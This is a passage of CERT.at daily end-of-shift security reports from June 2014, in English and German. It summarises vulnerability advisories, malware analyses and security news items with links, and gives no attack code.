VULNERABILITIES *** --------------------------------------------- Since we began our studies in the Masters degree on ICT security at the European University, drew our attention the possibility of doing a project under the guidance of Alejandro Ramos (@aramosf), a professional of the scene that we admire. After several ideas and proposals by both parties, we decided to make a project about finding new attack vectors on distributed reflection denial of service attacks (DRDOS). Recently this blog talked about it in a article focused on SNMP vulnerability,... --------------------------------------------- http://www.securitybydefault.com/2014/06/r2dr2-analysis-and-exploitation-of… *** PlugX RAT With "Time Bomb" Abuses Dropbox for Command-and-Control Settings *** --------------------------------------------- Monitoring network traffic is one of the means for IT administrators to determine if there is an ongoing targeted attack in the network. Remote access tools or RATs, commonly seen in targeted attack campaigns, are employed to establish command-and-control (C&C) communications. Although the network traffic of these RATs, such as Gh0st, PoisonIvy, Hupigon, and PlugX, among... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4SyyRxr49gU/ *** HackPorts - Mac OS X Penetration Testing Framework and Tools *** --------------------------------------------- HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a "super-project" that leverages existing code porting efforts, security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines. --------------------------------------------- http://hack-tools.blackploit.com/2014/06/hackports-mac-os-x-penetration-tes… *** Flaw Lets Attackers Bypass PayPal Two-Factor Authentication *** --------------------------------------------- There's a vulnerability in the way that PayPal handles certain requests from mobile clients that can allow an attacker to bypass the two-factor authentication mechanism for the service and transfer money from a victim's account to any recipient he chooses. The flaw lies in the way that the PayPal authentication flow works with the service's... --------------------------------------------- http://threatpost.com/flaw-lets-attackers-bypass-paypal-two-factor-authenti… *** ZyXEL P660RT2 EE rpAuth_1 cross-site scripting *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/93924 *** [papers] - Searching SHODAN For Fun And Profit *** --------------------------------------------- http://www.exploit-db.com/download_pdf/33859 *** Cisco IOS Software IPsec Denial of Service Vulnerability *** --------------------------------------------- CVE-2014-3299 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** GnuPG data packets denial of service *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/93935 *** VMSA-2014-0006.3 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** VMSA-2014-0007 *** --------------------------------------------- VMware product updates address security vulnerabilities in Apache Struts library --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0007.html *** TimThumb 2.8.13 Remote Code Execution *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060134 *** Bugtraq: [security bulletin] HPSBMU03053 rev.1 - HP Software Database and Middleware Automation, OpenSSL Vulnerability, Remote Unauthorized Access or Disclosure of Information *** --------------------------------------------- http://www.securityfocus.com/archive/1/532541

1 0

Tageszusammenfassung - Dienstag 24-06-2014
by Daily end-of-shift report 24 Jun '14

24 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 23-06-2014 18:00 − Dienstag 24-06-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Stop running this script? notification redirects to Angler Exploit Kit *** --------------------------------------------- ESET researchers identified a website serving up a Stop running this script? notification that, when clicked, redirects Internet Explorer users to the Angler Exploit Kit. --------------------------------------------- http://www.scmagazine.com/stop-running-this-script-notification-redirects-t… *** Android KeyStore::getKeyForName buffer overflow *** --------------------------------------------- Google Android is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the KeyStore::getKeyForName method. By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system under the keystore process. ... Remedy: Upgrade to the latest version of Android (4.4 or later), available from the Google Web site. See References. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/93916 *** Havex Hunts for ICS/SCADA Systems *** --------------------------------------------- During the past year, weve been keeping a close eye on the Havex malware family and the group behind it. Havex is known to be used in targeted attacks against different industry sectors, and it was earlier reported to have specific interest in the energy sector. The main components of Havex are a general purpose Remote Access Trojan (RAT) and a server written in PHP. --------------------------------------------- http://www.f-secure.com/weblog/archives/00002718.html *** Beware of Skype Adware *** --------------------------------------------- During our daily log analysis, we recently encountered a sample purporting to power up Skype with different emoticons. The binary, when installed, integrated itself with Skype and sent the following message contacts without further intervention. --------------------------------------------- http://research.zscaler.com/2014/06/beware-of-skype-adware.html *** Dramatic Drop in Vulnerable NTP Servers Used in DDoS Attacks *** --------------------------------------------- 95 percent of vulnerable NTP servers leveraged in massive DDoS attacks earlier this year have been patched, but the remaining servers still have experts concerned. --------------------------------------------- http://threatpost.com/dramatic-drop-in-vulnerable-ntp-servers-used-in-ddos-…

1 0

Tageszusammenfassung - Montag 23-06-2014
by Daily end-of-shift report 23 Jun '14

23 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 20-06-2014 18:00 − Montag 23-06-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** IBM Security Bulletin: IBM Security Proventia Network Enterprise Scanner is affected by the following OpenSSL vulnerabilities *** --------------------------------------------- Security vulnerabilities have been discovered in OpenSSL that were reported on June 5, 2014 by the OpenSSL Project. CVE(s): CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 Affected product(s) and affected version(s): Products: IBM Security Enterprise Scanner Versions: 2.3 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** Wordpress 3.9.1-CSRF vulnerability *** --------------------------------------------- This is the new version released by Wordpress. version is 3.9.1(Latest) Cross site request Forgery(CSRF) is present in this version at the url shown: http://localhost/wordpress/wp-comments-post.php --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060119 *** cups-filters 1.0.52 execute arbitrary commands *** --------------------------------------------- Topic: cups-filters 1.0.52 execute arbitrary commands Risk: High Text:The generate_local_queue function in utils/cups-browsed.c in cups-browsed in cups-filters before 1.0.53 allows remote IPP print... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060124 *** [SECURITY] [DSA 2966-1] samba security update *** --------------------------------------------- Multiple vulnerabilities were discovered and fixed in Samba, a SMB/CIFS file, print, and login server: CVE-2014-0178 Information leak vulnerability in the VFS code.. CVE-2014-0244 Denial of service (infinite CPU loop) in the nmbd.. CVE-2014-3493 Denial of service (daemon crash) in the smbd.. --------------------------------------------- https://lists.debian.org/debian-security-announce/2014/msg00147.html *** Security Bulletin: IBM Security Access Manager for Mobile and IBM Security Access Manager for Web appliances - LMI Authentication Bypass *** --------------------------------------------- IBM Security Access Manager for Mobile / IBM Security Access Manager for Web fails to properly handle certain input data such that it could be possible for an attacker to authenticate to the appliance Local Management Interface using invalid authentication data. CVE: CVE-2014-3053 CVSS Base Score: 8.0 --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21676700 *** A peek inside a commercially available Android-based botnet for hire *** --------------------------------------------- Relying on the systematic release of DIY (do-it-yourself) mobile malware generating tools, commercial availability of mobile malware releases intersecting with the efficient exploitation of legitimate Web sites through fraudulent underground traffic exchanges, as well as the utilization of cybercrime-friendly affiliate based revenue sharing schemes, cybercriminals continue capitalizing on the ever-growing Android mobile market segment for the purpose of achieving a positive ROI ... --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/m9Fm5dNY9bg/

1 0

Tageszusammenfassung - Freitag 20-06-2014
by Daily end-of-shift report 20 Jun '14

20 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 18-06-2014 18:00 − Freitag 20-06-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** SA-CONTRIB-2014-062 -Passsword Policy - Multiple vulnerabilities *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-062 Project: Password policy (third-party module) Version: 6.x, 7.x Date: 2014-June-18 Security risk: Moderately critical Exploitable from: Remote Vulnerability: Multiple vulnerabilities Description: The Password Policy module enables you to define and enforce password policies with various constraints on allowable user passwords.Access bypass and information disclosure (7.x only) --------------------------------------------- https://drupal.org/node/2288341 *** KDE: Fehler in Kmail ermöglicht Man-in-the-Middle-Angriffe *** --------------------------------------------- Im Code des POP3-Kioslaves in KDEs E-Mail-Anwendung Kmail beziehungsweise in Kdelibs ist ein Fehler, durch den ungültige Zertifikate ohne Abfrage akzeptiert werden. Angreifer könnten sich so in den verschlüsselten E-Mail-Verkehr einklinken. --------------------------------------------- http://www.golem.de/news/kde-fehler-in-kmail-erlaubt-man-in-the-middle-angr… *** Cisco WebEx Meeting Server Sensitive Information Disclosure Vulnerability *** --------------------------------------------- A vulnerability in the XML programmatic interface (XML PI) of Cisco WebEx Meeting Server could allow an authenticated, remote attacker to access sensitive information. The vulnerability is due to disclosure of the meeting information. An attacker could exploit this vulnerability by sending a crafted URL request to a vulnerable device. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Tausende Android-Apps geben geheime Schlüssel preis *** --------------------------------------------- Viele Android-Programme betten geheime Zugangsschlüssel direkt in ihren Quellcode ein. Ein Angreifer kann diese nutzen, um private Daten der App-Nutzer zu erbeuten und im schlimmsten Fall die Server-Infrastruktur der Entwickler übernehmen. --------------------------------------------- http://www.heise.de/security/meldung/Tausende-Android-Apps-geben-geheime-Sc… *** Android 4.4.4 is rolling out to devices; contains OpenSSL fix *** --------------------------------------------- Official change log lists "security fixes;" Googler says it is OpenSSL related. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/rMSXTBPBcjU/ *** 'Your fault - core dumped' - Diving into the BSOD caused by Rovnix *** --------------------------------------------- Recently we have noticed some Win32/Rovnix samples (detected as TrojanDropper:Win32/Rovnix.K) causing the BSOD on Windows 7 machines. We spent some time investigating this situation and discovered an interesting story behind the BSOD. Analyzing the crash dump We first saw TrojanDropper:Win32/Rovnix.K in October 2013. During a normal Windows Boot the malware will cause the BSOD. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-d… *** Linux Kernel PI Futex Requeuing Bug Lets Local Users Gain Elevated Privileges *** --------------------------------------------- A vulnerability was reported in the Linux Kernel. A local user can obtain elevated privileges on the target system. A local user can can exploit a flaw in the requeuing of Priority Inheritance (PI) to PI futexes to gain elevated privileges on the target system. --------------------------------------------- http://www.securitytracker.com/id/1030451 *** Yet Another BMC Vulnerability (And some added extras) *** --------------------------------------------- After considering the matter for the past 6 months while continuing to work with Supermicro on the issues, I have decided to release the following to everyone. On 11/7/2013, after reading a couple articles on the problems in IPMI by Rapid7's HD Moore (linked at the end), I discovered that Supermicro had created the password file PSBlock in plain text and left it open to the world on port 49152. --------------------------------------------- http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-… *** Simplocker ransomware: New variants spread by Android downloader apps *** --------------------------------------------- Since our initial discovery of Android/Simplocker we have observed several different variants. The differences between them are mostly in: Tor usage - some use a Tor .onion domain, whereas others use a more conventional C&C domain. Different ways of receiving the 'decrypt' command, indicating that the ransom has been paid. ... --------------------------------------------- http://www.welivesecurity.com/2014/06/19/simplocker-new-variants/ *** Pen Testing Payment Terminals - A Step by Step How-to Guide *** --------------------------------------------- There is plentitude of payment terminals out there and the design principles vary quite a bit. The ones I have run into in Finland appear to be tightly secured with no attack surface. At first glance, that is. These generally open only outbound connections and use SSL encryption to protect the traffic. Here, I explain why testing a simple, tightly secured payment terminal is not as simple as one might think. --------------------------------------------- http://pen-testing.sans.org/blog/pen-testing/2014/06/12/pen-testing-payment…

1 0

Tageszusammenfassung - Mittwoch 18-06-2014
by Daily end-of-shift report 18 Jun '14

18 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 17-06-2014 18:00 − Mittwoch 18-06-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Evernote forum breached, profile information compromised *** --------------------------------------------- The official discussion forum of Evernote has been hacked, leaving users profile information accessible to attackers. --------------------------------------------- http://www.scmagazine.com/evernote-forum-breached-profile-information-compr… *** Xen Lets Local Guests Obtain Hypervisor Heap Memory Contents *** --------------------------------------------- A vulnerability was reported in Xen. A local user can obtain potentially sensitive information from other domains. The system does not properly control access to memory pages during memory cleanup for dying guest systems. A local user on a guest system can access information from guest or hypervisor memory, potentially including guest CPU register state and hypercall arguments. --------------------------------------------- http://www.securitytracker.com/id/1030442 *** HP Software Executive Scorecard, Remote Execution of Code, Directory Traversal *** --------------------------------------------- VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Executive Scorecard. The vulnerability could be exploited remotely to allow remote code execution and directory traversal. References: CVE-2014-2609 (ZDI-CAN-2116, SSRT101436) CVE-2014-2610 (ZDI-CAN-2117, SSRT101435) CVE-2014-2611 (ZDI-CAN-2120, SSRT101431) --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** OpenStack Neutron L3-agent Remote Denial of Service Vulnerability *** --------------------------------------------- OpenStack Neutron is prone to a remote denial-of-service vulnerability. An attacker can leverage this issue to cause a denial-of-service condition; denying service to legitimate users. The following versions are vulnerable: Versions Neutron 2013.2.3 and prior. Versions Neutron 2014.1 and prior. --------------------------------------------- http://www.securityfocus.com/bid/68064/discuss *** Microsoft bessert absturzgefährdeten Virenschutz nach *** --------------------------------------------- Mit einem Update außer der Patchday-Reihe beseitigt Microsoft einen Fehler in der Malware Protection Engine durch den Schädlinge den Virenschutz lahmlegen konnten. --------------------------------------------- http://www.heise.de/newsticker/meldung/Microsoft-bessert-absturzgefaehrdete… *** VU#774788: Belkin N150 path traversal vulnerability *** --------------------------------------------- Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a path traversal vulnerability through the built-in web interface. The webproc cgi module accepts a getpage parameter which takes an unrestricted file path as input. The web server runs with root privileges by default, allowing a malicious attacker to read any file on the system. --------------------------------------------- http://www.kb.cert.org/vuls/id/774788 *** [remote] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability *** --------------------------------------------- Summary: Rayman Legends is a 2013 platform game developed by Ubisoft Montpellier and published by Ubisoft. ... Desc: The vulnerability is caused due to a memset() boundary error in the processing of incoming data thru raw socket connections on TCP port 1001, which can be exploited to cause a stack based buffer overflow by sending a long string of bytes on the second connection. Successful exploitation could allow execution of arbitrary code on the affected node. --------------------------------------------- http://www.exploit-db.com/exploits/33804 *** Forensik-Tool soll iCloud-Backups ohne Passwort herunterladen können *** --------------------------------------------- Elcomsoft hat angekündigt, dass sein "Phone Password Breaker" Authentifizierungstokens von Rechnern auslesen kann, mit denen sich Ermittler dann Zugang zu iCloud-Daten eines Verdächtigen verschaffen können. Dessen Passwort sei nicht mehr nötig. --------------------------------------------- http://www.heise.de/security/meldung/Forensik-Tool-soll-iCloud-Backups-ohne… *** When Vulnerabilities are Exploited: the Timing of First Known Exploits for Remote Code Execution Vulnerabilities *** --------------------------------------------- One of the questions I get asked from time to time is about the days of risk between the time that a vulnerability is disclosed and when we first see active exploitation of it; i.e. how long do organizations have to deploy the update before active attacks are going to happen? Trustworthy Computing's Security Science team published new data that helps put the timing of exploitation into perspective, in the recently released Microsoft Security Intelligence Report volume 16. --------------------------------------------- http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities…

1 0

Tageszusammenfassung - Dienstag 17-06-2014
by Daily end-of-shift report 17 Jun '14

17 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 16-06-2014 18:00 − Dienstag 17-06-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Malicious Web-based Java applet generating tool spotted in the wild *** --------------------------------------------- Despite the prevalence of Web based client-side exploitation tools as the cybercrime ecosystem's primary infection vector, in a series of blog posts, we've been emphasizing on the emergence of managed/hosted/DIY malicious Java applet generating tools/platforms, highlighting the existence of a growing market segment relying on 'visual social engineering' vectors for the purpose of tricking end users into executing malicious/rogue/fake Java applets, ultimately joining a --------------------------------------------- http://www.webroot.com/blog/2014/06/16/malicious-web-based-java-applet-gene… *** Cisco ASA WebVPN Information Disclosure Vulnerability *** --------------------------------------------- CVE ID: CVE-2014-2151 ... A vulnerability in the WebVPN portal of Cisco Adaptive Security Appliance (ASA) could allow an authenticated, remote attacker to view sensitive information from the affected system. The vulnerability is due to improper input validation in the WebVPN portal. An attacker could exploit this vulnerability by providing a crafted JavaScript file to an authenticated WebVPN user. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Security Advisory-Heap Overflow Vulnerability in Huawei eSap Platform *** --------------------------------------------- Huawei eSap software platform has four heap overflow vulnerabilities. Huawei products that have used this platform are affected. When receiving some special malformed packets, such devices access heap memory that is beyond the valid range and cause unexpected restart of the devices. If an attacker keeps sending such malformed packets, the devices will repeatedly restart, causing a denial of service (DoS) attack (Vulnerability ID: HWPSIRT-2014-0111). Huawei has provided fixed versions. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** IBM AIX ntpd Query Function Lets Remote Users Conduct Amplified Denial of Service Attacks *** --------------------------------------------- A vulnerability was reported in IBM AIX. A remote user can conduct amplified denial of service attacks. A remote user can exploit an administrative query function in ntpd to amplify distributed denial of service (DDoS) attacks against other sites. --------------------------------------------- http://www.securitytracker.com/id/1030433 *** Hacking the Java Debug Wire Protocol - or - 'How I met your Java debugger' *** --------------------------------------------- In this post, I will explain the Java Debug Wire Protocol (JDWP) and why it is interesting from a pentester's point of view. I will cover some JDWP internals and how to use them to perform code execution, resulting in a reliable and universal exploitation script. ... As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would (and should) mostly block the port it is --------------------------------------------- http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.ht… *** CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing *** --------------------------------------------- A malicious server or man-in-the-middle attacker could possibly use this flaw to execute arbitrary code as the PHP interpreter if a PHP application uses dns_get_record() to perform a DNS query. --------------------------------------------- https://bugzilla.redhat.com/show_bug.cgi?id=1108447 *** SLocker Android Ransomware Communicates Via Tor And SMS *** --------------------------------------------- A little over two weeks ago, we found a new family of Android ransomware: SLocker.We have no evidence that SLocker is related to Koler, the most recently discovered Android ransomware. It does however carry through on the threat Koler made. Unlike Koler - which pretended to, but didnt actually encrypt files - SLocker will actually scan the devices SD card for specific file types: When the SLocker app is launched, it encrypts these files and then displays a ransom message:The message --------------------------------------------- http://www.f-secure.com/weblog/archives/00002716.html *** Microsoft dichtet OneDrive-Links ab *** --------------------------------------------- In der Dokument-Freigabe von Microsofts Cloud-Speicher klaffte ein Loch, das es Angreifern erlaubt hätte, unbefugten Zugriff auf Dokumente zu erhalten. Microsoft hat die Lücke nun geschlossen, altere Freigabe-URLs könnten aber noch verwundbar sein. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-dichtet-OneDrive-Links-ab-22… *** Technology sites "riskier" than illegal sites in 2013, according to Symantec data *** --------------------------------------------- The 'riskiest' pages to visit in 2013 were technology websites, according to data from users of Norton Web Safe, which monitors billions of traffic requests and millions of software downloads per day. --------------------------------------------- http://www.scmagazine.com/technology-sites-riskier-than-illegal-sites-in-20… *** Popular HTTPS Sites Still Vulnerable to OpenSSL Connection Hijacking Attack *** --------------------------------------------- Some of the Internets most visited websites that encrypt data with the SSL protocol are still susceptible to a recently announced vulnerability that could allow attackers to intercept and decrypt connections. --------------------------------------------- http://www.cio.com/article/754250/Popular_HTTPS_Sites_Still_Vulnerable_to_O… *** Researchers Outline Spammers Business Ecosystem *** --------------------------------------------- An anonymous reader writes A team of researchers at the UC Santa Barbara and RWTH Aachen presented new findings on the relationship of spam actors [abstract; full paper here] at the ACM Symposium on Information, Computer and Communications Security. This presents the first end-to-end analysis of the spam delivery ecosystem including: harvesters crawl the web and compile email lists, botmasters infect and operate botnets, and spammers rent botnets and buy email lists to run spam campaigns. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/-AKpHVGH5us/story01.htm

1 0

Tageszusammenfassung - Montag 16-06-2014
by Daily end-of-shift report 16 Jun '14

16 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 13-06-2014 18:00 − Montag 16-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** BlackEnergy Rootkit, Sort of *** --------------------------------------------- A sample of the BlackEnergy family was recently uploaded to VirusTotal from Ukraine. The family is allegedly the same malware used in the cyber attack against Georgia in 2008. The malware provides attackers full access to their infected hosts. Check out SecureWorks detailed analysis from 2010 for more information about the family.The new sample is not much of a rootkit anymore, in the sense that it no longer hides files, .. --------------------------------------------- http://www.f-secure.com/weblog/archives/00002715.html *** Vorinstallierter Trojaner auf chinesischem S4-Klon gefunden *** --------------------------------------------- Spionagesoftware liest sensible Daten aus und lässt Gerät zu Wanze umfunktionieren. --------------------------------------------- http://derstandard.at/2000002023277 *** Hinweis für Debian-Benutzer bei OpenSSL Upgrade *** --------------------------------------------- Hinweis für Debian-Benutzer bei OpenSSL Upgrade6. Juni 2014Again, Openssl was the centre of patching in the last two days. While Debian was quick to release a patched version, it seems like Debian forgot to restart some services which link against openssl (libssl) get restarted.Here is how you can check with services use .. --------------------------------------------- http://www.cert.at/services/blog/20140606123624-1163.html *** Ruling Raises Stakes for Cyberheist Victims *** --------------------------------------------- A Missouri firm that unsuccessfully sued its bank to recover $440,000 stolen in a 2010 cyberheist may now be on the hook to cover the financial institutions legal fees, an appeals court has ruled. Legal experts say the decision is likely to discourage future victims from pursuing such cases. --------------------------------------------- http://krebsonsecurity.com/2014/06/ruling-raises-stakes-for-cyberheist-vict… *** BruteForce-Angriffe auf wp-login.php abwehren *** --------------------------------------------- Gegenwärtig werden verstärkt "BruteForce"-Attacken auf WordPress-Blogs gefahren. Auch wir registrieren eine Zunahme solcher Angriffe. [...] Im nachfolgenden zeigen wir Ihnen wie Sie den Erfolg solcher Angriffe eindämmen können. --------------------------------------------- http://blog.initiative-s.de/2013/04/bruteforce-angriffe-auf-wp-login-php-ab… *** One-third of cyber attacks take hours to detect *** --------------------------------------------- More than one-third of cyber attacks take hours to detect. Even more alarming, resolving breaches takes days, weeks, and in some cases, even .. --------------------------------------------- http://www.net-security.org/secworld.php?id=17005 *** Ende-zu-Ende-Verschlüsselung für BlackBerry Messenger *** --------------------------------------------- Der BlackBerry Messenger erhält mit BBM Protected eine Ende-zu-Ende-Verschlüsselung, zunächst nur im verschärften Regulated-Modus ohne BlackBerry Balance oder Android- und iOS-Clients. --------------------------------------------- http://www.heise.de/security/meldung/Ende-zu-Ende-Verschluesselung-fuer-Bla… *** Deutscher Nachfolger für TrueCrypt angekündigt *** --------------------------------------------- Das aus nicht ganz geklärten Gründen eingestellte Open-Source-Verschlüsselungs-Projekt TrueCrypt hat einen neuen Anwärter auf seine Nachfolge. Die angekündigte Software hat ihren direkten Ursprung in TrueCrypt. --------------------------------------------- http://www.heise.de/ix/meldung/Deutscher-Nachfolger-fuer-TrueCrypt-angekuen… *** Towelroot knackt Android in Sekunden *** --------------------------------------------- Geohot hat überraschend ein Tool herausgebracht, das fast alle Android-Geräte rooten können soll. In einem ersten Test funktionierte das erstaunlich gut. Er demonstriert damit aber auch eine fatale Sicherheitslücke. --------------------------------------------- http://www.heise.de/security/meldung/Towelroot-knackt-Android-in-Sekunden-2… *** Multiple vulnerabilities in Openfiler *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/93764 http://xforce.iss.net/xforce/xfdb/93763 http://xforce.iss.net/xforce/xfdb/93762 http://xforce.iss.net/xforce/xfdb/93761 *** Bugtraq: [SE-2014-01] Security vulnerabilities in Oracle Database Java VM *** --------------------------------------------- http://www.securityfocus.com/archive/1/532433 *** Asterisk MixMonitor Lets Remote Authenticated Users Execute Arbitrary Shell Commands *** --------------------------------------------- http://www.securitytracker.com/id/1030426 *** PostgreSQL 8.4.1 Denial Of Service Integer Overflow *** --------------------------------------------- PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060082 *** PowerDNS in default configuration is vulnerable to DoS attack *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060083

1 0

Tageszusammenfassung - Freitag 13-06-2014
by Daily end-of-shift report 13 Jun '14

13 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 12-06-2014 18:00 − Freitag 13-06-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Microsoft zieht die "Secure Boot"-Bremse *** --------------------------------------------- Mit einem Update für Windows 8, Server 2012, 8.1 und Server 2012 R2 installiert Microsoft neue Schlüssel-Datenbanken, die den Start einiger UEFI-Module blockieren. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-zieht-die-Secure-Boot-Bremse… *** Setting HoneyTraps with ModSecurity: Adding Fake Hidden Form Fields *** --------------------------------------------- This blog post continues with the topic of setting "HoneyTraps" within your web applications to catch attackers. Please review the previous posts for more examples: Project Honeypot Integration Unused Web Ports Adding Fake robots.txt Entries Adding Fake HTML Comments This blog post will discuss Recipe 3-4: Adding Fake Hidden Form Fields from my book "Web Application Defenders Cookbook: Battling Hackers and Protecting Users". Recipe 3-4: Adding Fake Hidden Form Fields --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/btSzvx21q3s/setting-ho… *** Hacker claims PayPal loophole generates FREE MONEY *** --------------------------------------------- Convicted hacker comes good with fraudster flowchart A PayPal loophole can be exploited to earn free cash according to a convicted former NASA hacker turned white hat. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/06/13/hacker_clai… *** You have no SQL inj--... sorry, NoSQL injections in your application *** --------------------------------------------- Everyone knows about SQL injections. They are classic, first widely publicized by Rain Forest Puppy, and still widely prevalent today (hint: don't interpolate query string params with SQL). But who cares? SQL injections are so ten years ago. I want to talk about a vulnerability I hadn't run into before that I recently had a lot of fun exploiting. It was a NoSQL injection. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/06/12/you-have-… *** Banking malware using Windows to block anti-malware apps *** --------------------------------------------- BKDR_VAWTRAK is using Software Restriction Policies to restrict security software. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/s0xxmloC9XA/ *** Mergers and Acquisitions: When Two Companies and APT Groups Come Together *** --------------------------------------------- With Apple's purchase of Beats, Pfizer's failed bids for AstraZeneca, and financial experts pointing to a rally in the M&A market, the last month was a busy one for mergers and acquisitions. Of course, when we first see headlines of... --------------------------------------------- http://www.fireeye.com/blog/technical/targeted-attack/2014/06/mergers-and-a… *** Microsofts Juni-Patches können Office-2013-Installation zerstören *** --------------------------------------------- Die Office-2013-Patches vom 11. Juni bereiten mitunter größere Probleme und können dazu führen, sich die Office-Programme nicht mehr starten lassen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Microsofts-Juni-Patches-koennen-Offi… *** How iOS 8 Will Affect the Security of iPhones and iPads *** --------------------------------------------- Apple's mobile OS has been enhanced, but is it more secure? --------------------------------------------- http://www.symantec.com/connect/blogs/how-ios-8-will-affect-security-iphone… *** Stratfor-Hack: Geheimer Bericht stellt gravierende Sicherheitslücken fest *** --------------------------------------------- Eine Untersuchung nach dem Einbruch auf die Stratfor-Server durch die Gruppe Antisec hat ergeben: Das Unternehmen hat wichtigste Sicherheitsmaßnahmen nicht beachtet. --------------------------------------------- http://www.golem.de/news/stratfor-hack-geheimer-bericht-stellt-gravierende-… *** CloudFlare offers free DDoS protection to public interest websites *** --------------------------------------------- A project launched by CloudFlare, a provider of website performance and security services, allows organizations engaged in news gathering, civil society and political or artistic speech to use the companys distributed denial-of-service (DDoS) protection technology for free.The goal of the project, dubbed Galileo, is to protect freedom of expression on the Web by helping sites with public interest information from being censored through online attacks, according to the San Francisco-based --------------------------------------------- http://www.csoonline.com/article/2363382/cloudflare-offers-free-ddos-protec… *** ISC Patches Critical DoS Vulnerability in BIND *** --------------------------------------------- A critical, remotely exploitable bug in some BIND domain name system (DNS) servers could cause a denial of service situation and trigger them to crash. --------------------------------------------- http://threatpost.com/isc-patches-critical-dos-vulnerability-in-bind/106653 *** CVE-2014-3859: BIND named can crash due to a defect in EDNS printing processing *** --------------------------------------------- A specially crafted query sent to a BIND nameserver can cause it to crash with a REQUIRE assertion error. --------------------------------------------- https://kb.isc.org/article/AA-01166/74/CVE-2014-3859:-BIND-named-can-crash-… *** IBM Security Bulletin: IBM Algo One - cryptographic key information discovery (CVE-2014-0076) *** --------------------------------------------- Under certain circumstances, a local attacker could discover cryptographic key information from IBM Algo One. CVE(s): CVE-2014-0076 Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21675765 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL *** --------------------------------------------- Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL CVE(s): CVE-2010-5298 Affected product(s) and affected version(s): AIX 5.3, 6.1 and 7.1 VIOS 2.X Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://aix.software.ibm.com/aix/efixes/security/openssl_advisory8.asc X-Force Database: http://xforce.iss.net/xforce/xfdb/92632 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/race_condition_in_the… *** IBM Security Advisory for AIX *** --------------------------------------------- AIX OpenSSL SSL/TLS Man In The Middle (MITM) vulnerability AIX OpenSSL DTLS recursion flaw AIX OpenSSL DTLS invalid fragment vulnerability AIX OpenSSL SSL_MODE_RELEASE_BUFFERS NULL pointer dereference AIX OpenSSL Anonymous ECDH denial of service --------------------------------------------- http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc *** Cisco Autonomic Networking Infrastructure Overwrite Vulnerability *** --------------------------------------------- CVE-2014-3290 --------------------------------------------- 